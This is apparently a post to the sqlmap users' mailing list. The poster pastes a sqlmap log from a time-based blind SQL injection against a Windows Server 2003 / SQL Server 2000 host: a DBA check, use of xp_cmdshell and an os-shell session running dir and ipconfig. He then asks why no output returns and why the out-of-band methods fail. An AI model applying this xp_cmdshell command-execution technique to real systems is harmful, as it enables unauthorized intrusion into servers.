Hi All
I have a time based blind injection on a machine running Windows Server
2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be
able to enable xp_cmdshell, and indeed:
[13:10:12] [INFO] testing if current user is DBA
[13:10:12] [INFO] retrieved: 1
[13:10:29] [INFO] checking if xp_cmdshell extended procedure is available,
please wait..
[13:10:40] [INFO] xp_cmdshell extended procedure is available
[13:10:41] [INFO] going to use xp_cmdshell extended procedure for operating
system command execution
[13:10:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a]
[13:10:53] [INFO] retrieved:
No output
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
[13:11:11] [INFO] retrieved:
No output
os-shell> exit
[13:31:24] [INFO] cleaning up the database management system
[13:31:26] [INFO] Fetched data logged to text files under...
As you can see, no output is returned (is this because of the injection
type I wonder?).
I've tried the various out of bounds methods with BT and msf too, but this
seems to fail at various stages.
Could it be that the database server is separate from the web server and is
totally isolated from the outside world by egress rules?
I'm trying to understand why in this case nothing seems to be working.
Any ideas would be great.
Regards
Chris
------------------------------------------------------------------------------
Write once. Port to many.
Get the SDK and tools to simplify cross-platform app development. Create
new or port existing apps to sell to consumers worldwide. Explore the
Intel AppUpSM program developer opportunity. appdeveloper.intel.com/join
http://p.sf.net/sfu/intel-appdev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
